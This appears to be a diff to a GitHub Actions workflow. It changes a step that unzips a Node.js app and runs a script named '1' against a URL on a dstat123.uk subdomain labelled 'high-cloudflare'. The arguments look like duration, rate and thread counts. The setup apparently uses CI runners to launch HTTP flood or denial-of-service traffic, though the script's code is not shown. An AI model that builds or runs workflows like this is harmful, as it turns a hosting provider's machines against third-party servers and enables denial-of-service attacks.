--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -22,4 +22,4 @@ jobs:
         run: unzip my_node_app.zip
 
       - name: Chạy script Node.js
-        run: node 1 https://captcha-1.dstat123.uk/a772373e-5b45-4c62-9c43-8ab0aa4b3d18 2 4
+        run: node 1 https://high-cloudflare.dstat123.uk/1ed6fb55-157d-4c90-9f5e-2178febf3b50 260 1 4
